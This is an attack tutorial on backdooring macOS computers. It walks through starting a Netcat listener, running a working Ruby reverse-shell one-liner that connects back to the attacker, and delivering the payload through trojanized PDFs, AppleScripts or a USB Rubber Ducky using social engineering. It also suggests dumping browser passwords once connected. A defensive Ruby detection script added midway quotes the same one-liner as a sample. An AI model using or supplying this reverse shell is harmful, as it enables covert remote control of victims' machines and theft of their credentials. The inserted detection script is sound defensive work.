Step 1: Start a Netcat Listener
To start using Ruby as a backdooring mechanism, open a terminal in Kali (or any Unix-based operating system with Netcat installed), and use the Netcat command below to start a listener. This is where the target macOS device will connect once the Ruby command is executed.
nc -v -l -p 9999
- Netcat will open a listening (-l) port on every available interface.
- If you are operating in a local network, the Netcat listener will be available on your local address (e.g., 192.168.0.X). If the listener is started on a virtual private server (VPS), be sure to use the IP address of your VPS in the Ruby commands that follow.
- The port (-p) number (9999) is arbitrary and can be changed.
- The verbose (-v) argument is important here. Without it, when a connection from the target MacBook, Mac Pro, or any other computer running macOS is established, the Netcat terminal won't change. To get some kind of indication that the payload was executed successfully, enable verbose output.
Step 2: Use Ruby to Create a Backdoor
Execute this on the macOS device to create a backdoor to the Netcat listener:
ruby -rsocket -e "c=TCPSocket.new('1.2.3.4','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
The one-liner above creates a TCP socket (TCPSocket.new) and a small loop (while … end) that says "while there is data coming in, assign it to cmd, run the input as a shell command, and print the result back to our terminal (IO.popen(cmd,'r'){|io|c.print io.read})." Essentially, we're telling Ruby to take the command we submit, execute it, read the output, and send it back to us, over and over again until we break the connection to the macOS device.
Remember to change the IP address (1.2.3.4) and port number (9999) to match the Netcat listener created in the previous step. This can be a local network IP address or the IP address of your VPS. On the attacker's system (as shown below), the Netcat terminal will show that a new connection was established.
nc -v -l -p 9999
listening on [any] 9999 ...
connect to [192.168.1.55] from (UNKNOWN) [192.168.1.31] 50328
Situational-awareness and post-exploitation attacks can begin. If this Ruby command is embedded into a trojanized PDF and passed to the target, you may not have root access. In that case, there are several ways of gaining privileged access. If Ruby was used to physically backdoor a macOS device, you'll have root and can begin dumping passwords stored in the target's web browsers. Either way, this Ruby command will completely bypass antivirus software like Avast and AVG.
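From the defender's side, the one-liner explained above has a distinctive shape that is easy to spot in process telemetry: an inline (-e) Ruby script that loads the socket library, opens a TCPSocket, and feeds whatever it reads into a command-execution primitive. The following script is an added example and is not part of the original article. It assumes input in the form of `ps -axo pid,user,command` lines (or equivalent EDR process events), and the indicator weights and alert threshold are my own choices, not a published rule. The sample process lines are constructed for the example; the address 203.0.113.10 is a documentation-range placeholder.

```ruby
# Added example: score process command lines for the Ruby reverse-shell pattern
# (inline -e script + socket library + TCPSocket + command execution + read loop).
# Input format assumed: one `ps -axo pid,user,command` line per element.

# Indicator name => [regex, weight]. A lone inline Ruby script is noise; a socket
# plus a command-execution primitive in the same -e body is what raises the score.
INDICATORS = {
  inline_script:  [/\bruby\b.*\s-e\b/, 1],
  socket_library: [/-rsocket\b|require\s*['"]socket['"]/, 2],
  tcp_client:     [/TCPSocket\.new\(/, 3],
  command_exec:   [/IO\.popen\(|`[^`]*`|\bexec\(|\bsystem\(/, 3],
  read_eval_loop: [/while\s*\(?\s*\w+\s*=\s*\w+\.gets\)?/, 2],
}.freeze

# Threshold chosen (assumption) so that socket + exec primitives are required to alert.
ALERT_THRESHOLD = 8

Finding = Struct.new(:pid, :user, :score, :matched, :command)

# Parse one `ps -axo pid,user,command` line into its fields; nil if it does not fit.
def parse_ps_line(line)
  m = line.strip.match(/\A(\d+)\s+(\S+)\s+(.*)\z/)
  return nil unless m
  { pid: m[1].to_i, user: m[2], command: m[3] }
end

# Score a command line against INDICATORS; returns [total_score, matched_indicator_names].
def score_command(command)
  matched = INDICATORS.select { |_name, (re, _weight)| command.match?(re) }.keys
  score = matched.sum { |name| INDICATORS[name][1] }
  [score, matched]
end

# Return a Finding for every process whose score reaches the alert threshold.
def find_reverse_shells(ps_lines, threshold: ALERT_THRESHOLD)
  findings = []
  ps_lines.each do |line|
    proc_info = parse_ps_line(line)
    next unless proc_info
    score, matched = score_command(proc_info[:command])
    next if score < threshold
    findings << Finding.new(proc_info[:pid], proc_info[:user], score, matched, proc_info[:command])
  end
  findings
end

# Constructed sample (not real telemetry): a system daemon, two benign Ruby invocations,
# and the page's one-liner with a placeholder address and port.
SAMPLE_PS_OUTPUT = [
  "412 root  /usr/sbin/syslogd",
  "733 alice /usr/bin/ruby -e puts(Time.now)",
  "801 alice ruby /Users/alice/work/app.rb --port 3000",
  "902 alice /usr/bin/ruby -rsocket -e c=TCPSocket.new('203.0.113.10','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end",
].freeze

if __FILE__ == $PROGRAM_NAME
  find_reverse_shells(SAMPLE_PS_OUTPUT).each do |f|
    puts "ALERT pid=#{f.pid} user=#{f.user} score=#{f.score} indicators=#{f.matched.join(',')}"
    puts "  #{f.command}"
  end
end
```

Only the fourth sample line reaches the threshold; the plain `ruby -e puts(Time.now)` job scores 1 and is ignored. On a live host, the matching network-side indicator is an outbound TCP connection from a ruby process to an unusual port, which is worth correlating with this process-level match, since the page's claim that the command evades Avast and AVG means signature-based antivirus should not be relied on to catch it.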
Step 3: Use a Social Engineering Attack
Such payloads can be executed using a USB Rubber Ducky or simply embedded into AppleScripts and sent to the victim. There are many ways to get the payload to the target, but you'll have to use your social engineering skills to get them to open it.